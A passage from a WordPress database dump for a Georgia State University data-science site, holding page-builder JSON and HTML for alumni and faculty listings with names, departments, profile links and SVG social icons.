Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c395\",\"index\":1,\"id\":\"182-c399\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c400\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c401\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c402\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c400\",\"index\":2,\"id\":\"182-c403\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c405\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c406\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c407\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c405\",\"index\":2,\"id\":\"182-c408\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c405\",\"index\":1,\"id\":\"182-c409\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c410\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c411\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c412\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c410\",\"index\":2,\"id\":\"182-c413\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c410\",\"index\":1,\"id\":\"182-c414\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c255\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c254\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c282\",\"parentId\":\"182-c281\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c281\",\"parentId\":\"182-c280\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c280\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-09-29 22:13:21','2023-09-30 02:13:21','',562,'https://gsudice.dataconn.net/?p=1610',0,'revision','',0),(1611,1,'2023-09-29 22:13:21','2023-09-30 02:13:21','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c425\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c425 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c451\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c451 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c452-outer\">\n            <div data-colibri-id=\"182-c452\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c452 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c453\" class=\"h-global-transition-all h-heading style-986 style-local-182-c453 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c453\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c426\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c426 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c427-outer\">\n            <div data-colibri-id=\"182-c427\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c427 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c428\" class=\"d-block style-973 style-local-182-c428 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg\" class=\"wp-image-629 style-973-image style-local-182-c428-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c428-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c429\" class=\"h-global-transition-all h-heading style-974 style-local-182-c429 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c429\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c430\" class=\"h-text h-text-component style-975 style-local-182-c430 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c431\" class=\"h-text h-text-component style-976 style-local-182-c431 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c432\" class=\"style-977 style-local-182-c432 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c433-outer\">\n            <div data-colibri-id=\"182-c433\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c433 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c434\" class=\"d-block style-978 style-local-182-c434 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg\" class=\"wp-image-1409 style-978-image style-local-182-c434-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c434-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c435\" class=\"h-global-transition-all h-heading style-974 style-local-182-c435 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c435\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c436\" class=\"h-text h-text-component style-975 style-local-182-c436 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c437\" class=\"h-text h-text-component style-976 style-local-182-c437 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c438\" class=\"style-979 style-local-182-c438 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 